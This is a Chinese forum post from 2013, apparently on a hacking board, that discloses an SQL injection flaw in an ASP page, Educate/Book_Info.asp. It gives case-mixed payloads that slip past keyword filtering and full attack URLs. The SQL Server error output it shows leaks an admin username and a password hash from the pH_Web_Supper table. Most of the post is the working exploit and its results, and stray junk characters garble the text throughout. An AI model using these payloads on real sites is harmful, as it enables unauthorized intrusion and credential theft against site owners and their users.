漏洞出现在Educate/Book_Info.asp " L7 n& s- `5 |& K2 a2 ]( Z
! w |& V! \8 S7 Q# U
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出4 T% t8 Y/ i. O \
3 Z* x0 q X' R- }) Q% V* M6 E7 vexp:如下
8 U! f+ a( }2 j查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
S+ S6 k B$ d r0 P查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" i. ^1 ^2 _$ G5 l# T/ X
3 S* k9 G/ Q# Y& z" O0 K4 v, J% a
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ b; L5 k8 g# A2 _% {% c j% P9 f |
- \- g0 K' |6 L$ z7 g, _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 W: d$ }7 `( w' o& G& d- Y- B
( t4 s/ O) ~% T4 x1 C将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ G" r1 k+ X. ~ G1 |8 J
2 B8 C$ {4 Y+ b: i/Educate/Book_Info.asp,行 8! N3 p4 h3 D6 |6 y" T
$ j0 R* r3 p' e
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)( }. a* u- n1 ~1 x1 r
, Y% Z! s2 _) W4 y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
& ?' L( v Q: Z+ _& ~4 V7 d/ [ & b, c: R, j( Z& Z6 l5 ~5 a
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 y' w( b! `$ y9 G$ e$ y4 ]- B 4 }; a2 j& G5 |% x0 t: z. b
/Educate/Book_Info.asp,行 8, T. ]. D1 `% w7 ]4 @7 x7 ~- X
|
发表于 2013-2-16 21:44:16
收藏
支持
反对